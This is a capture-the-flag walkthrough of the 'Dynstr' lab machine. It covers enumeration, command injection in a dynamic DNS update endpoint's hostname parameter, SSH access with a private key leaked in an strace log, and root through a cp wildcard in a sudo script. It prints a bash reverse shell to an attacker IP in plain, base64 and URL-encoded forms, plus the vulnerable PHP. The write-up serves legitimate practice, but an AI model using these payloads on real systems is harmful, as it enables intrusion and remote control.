# DYNSTR

## Scanning

NMAP

```
22/tcp open  ssh
53/tcp open  domain
80/tcp open  http
```

## Enumeration

port **80**

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjZRpvEBSJaZVEVj4B%2Fimage.png?alt=media\&token=8e7e06ad-7efa-4fc6-95a5-393ff6b2aefc)

we have beta mode

Credentials `dynadns:sndanyd`

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjZcaIbLPnEwzI7gHU%2Fimage.png?alt=media\&token=26bb51fe-e3ff-4e7b-a0c1-92ff77cfba05)

email

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjZnTb0821UuDeVmsT%2Fimage.png?alt=media\&token=aeaf1cd2-f90c-46b8-a25f-dadef9705934)

**whatweb**

```
➜  ~ sudo whatweb dynstr.htb
http://dynstr.htb [200 OK] Apache[2.4.41], Bootstrap, Country[RESERVED][ZZ], Email[#,dns@dyna.htb], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.10.244], JQuery, Modernizr, Script[text/javascript], Title[Dyna DNS]
```

after some directory busting

i found this `http://dynstr.htb/nic/update`

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjZsvyzEaom5yQHUsR%2Fimage.png?alt=media\&token=565b7e48-8064-48cc-a694-3cf490e7b074)

after some googling i found this [page](https://www.noip.com/integrate/request)

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjZvlA_wbFBXKrNlkr%2Fimage.png?alt=media\&token=1f665cd0-ccdc-440e-a592-fbd22901f97b)

lets preform this using BurpSuite ... you may get `911 [wrngdom: htb]` so try to change hostname

with these values

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjj_-DKMbQ3LYzt2Ik_%2Fimage.png?alt=media\&token=f8d4edd0-d567-4651-8878-2247b9450069)

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjj_1KyH5izsiWKRUDC%2Fimage.png?alt=media\&token=3fbdcdd3-831d-43e9-a04c-2c465e145faf)

## Exploit

Test hostname Parameter by adding ; or \`

we can use \`\` in hostname param without break logic

reverse shell `bash -i >& /dev/tcp/10.10.16.17/4242 0>&1`

base64 encode `YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4xNy80MjQyIDA+JjEK` to keep logic up

some bash to decode payload on target

```
`echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4xNy80MjQyIDA+JjEK' | base64 -d | bash`
```

if we try to send like that logic down

so use url encoding

```
%60%65%63%68%6f%20%27%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%69%34%78%4e%79%38%30%4d%6a%51%79%49%44%41%2b%4a%6a%45%4b%27%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%60
```

add `Authorization: Basic ZHluYWRuczpzbmRhbnlk` header value = base64(dynadns:sndanyd)

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjj_9eiII-y9o-moSqK%2Fimage.png?alt=media\&token=fc0accfe-0eae-45ed-84d1-8ffbd8fe51da)

setup listener and Send

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjj_Bnk3mHZwsxWSaCq%2Fimage.png?alt=media\&token=f817a89a-c658-4ff5-9260-99d5ca4230b8)

Finally in 🎉

* [x]  Service Shell Access

```
// Vuln Code
www-data@dynstr:/var/www/html/nic$ cat update
<?php
  // Check authentication
  if (!isset($_SERVER['PHP_AUTH_USER']) || !isset($_SERVER['PHP_AUTH_PW']))      { echo "badauth\n"; exit; }
  if ($_SERVER['PHP_AUTH_USER'].":".$_SERVER['PHP_AUTH_PW']!=='dynadns:sndanyd') { echo "badauth\n"; exit; }
​
  // Set $myip from GET, defaulting to REMOTE_ADDR
  $myip = $_SERVER['REMOTE_ADDR'];
  if ($valid=filter_var($_GET['myip'],FILTER_VALIDATE_IP))                       { $myip = $valid; }
​
  if(isset($_GET['hostname'])) {
    // Check for a valid domain
    list($h,$d) = explode(".",$_GET['hostname'],2);
    $validds = array('dnsalias.htb','dynamicdns.htb','no-ip.htb');
    if(!in_array($d,$validds)) { echo "911 [wrngdom: $d]\n"; exit; }
    // Update DNS entry
    $cmd = sprintf("server 127.0.0.1\nzone %s\nupdate delete %s.%s\nupdate add %s.%s 30 IN A %s\nsend\n",$d,$h,$d,$h,$d,$myip);
    system('echo "'.$cmd.'" | /usr/bin/nsupdate -t 1 -k /etc/bind/ddns.key',$retval);
    // Return good or 911
    if (!$retval) {
      echo "good $myip\n";
    } else {
      echo "911 [nsupdate failed]\n"; exit;
    }
  } else {
    echo "nochg $myip\n";
  }
?>
​
```

### Getting User

there is 2 users `bindmgr, dyna`

in this directory `/home/bindmgr/support-case-C62796521` we fine `strace-C62796521.txt`

`cat strace-C62796521.txt`

we find private key

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjj_I5vbRBFeHElrmQu%2Fimage.png?alt=media\&token=859be68f-115c-4642-96cc-88a1ab948b93)

copy it to attacker machine

`chmod 600 pri_key`

ssh targ not working ....

add ip zone

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjj_KpdmwFtwyt6XeMJ%2Fimage.png?alt=media\&token=4705afa8-5fa2-4a27-99e3-cb5e042878c4)

ssh again it works

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjj_T2Yg5dxG_fEqhkY%2Fimage.png?alt=media\&token=97635b41-cc90-4b20-a99c-e64c689e7267)

* [x] USER SHELL ACCESS

## Privilege Escalation

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjj_Xge_3E5usIfMe4Z%2Fimage.png?alt=media\&token=d536a094-0e3e-4308-a443-1ea94403f556)

cat this script find this

```
bindmgr@dynstr:~$ cat /usr/local/bin/bindmgr.sh
#!/usr/bin/bash
​
# This script generates named.conf.bindmgr to workaround the problem
# that bind/named can only include single files but no directories.
#
# It creates a named.conf.bindmgr file in /etc/bind that can be included
# from named.conf.local (or others) and will include all files from the
# directory /etc/bin/named.bindmgr.
#
# NOTE: The script is work in progress. For now bind is not including
#       named.conf.bindmgr. 
#
# TODO: Currently the script is only adding files to the directory but
#       not deleting them. As we generate the list of files to be included
#       from the source directory they won't be included anyway.
​
BINDMGR_CONF=/etc/bind/named.conf.bindmgr
BINDMGR_DIR=/etc/bind/named.bindmgr
​
indent() { sed 's/^/    /'; }
​
# Check versioning (.version)
echo "[+] Running $0 to stage new configuration from $PWD."
if [[ ! -f .version ]] ; then
    echo "[-] ERROR: Check versioning. Exiting."
    exit 42
fi
if [[ "`cat .version 2>/dev/null`" -le "`cat $BINDMGR_DIR/.version 2>/dev/null`" ]] ; then
    echo "[-] ERROR: Check versioning. Exiting."
    exit 43
fi
​
# Create config file that includes all files from named.bindmgr.
echo "[+] Creating $BINDMGR_CONF file."
printf '// Automatically generated file. Do not modify manually.\n' > $BINDMGR_CONF
for file in * ; do
    printf 'include "/etc/bind/named.bindmgr/%s";\n' "$file" >> $BINDMGR_CONF
done
​
# Stage new version of configuration files.
echo "[+] Staging files to $BINDMGR_DIR."
cp .version * /etc/bind/named.bindmgr/
​
# Check generated configuration with named-checkconf.
echo "[+] Checking staged configuration."
named-checkconf $BINDMGR_CONF >/dev/null
if [[ $? -ne 0 ]] ; then
    echo "[-] ERROR: The generated configuration is not valid. Please fix following errors: "
    named-checkconf $BINDMGR_CONF 2>&1 | indent
    exit 44
else 
    echo "[+] Configuration successfully staged."
    # *** TODO *** Uncomment restart once we are live.
    # systemctl restart bind9
    if [[ $? -ne 0 ]] ; then
        echo "[-] Restart of bind9 via systemctl failed. Please check logfile: "
    systemctl status bind9
    else
    echo "[+] Restart of bind9 via systemctl succeeded."
    fi
fi
```

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjj_bOmMdXYoij0Npnh%2Fimage.png?alt=media\&token=dee78bd2-d99b-46bd-86be-a28b34d06692)

this part is the key WILDCARD 👏

> if this line may looks confuse explain ⬇️
>
> cp \[source] \[source] \[destination]
>
> cp .version \* /etc/bind/named.bindmgr/

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjj_fLkbN_90brpGk9F%2Fimage.png?alt=media\&token=dd58b04d-023c-48e0-9958-56c5b9765c9f)

* [x] ROOT SHELL ACCESS

�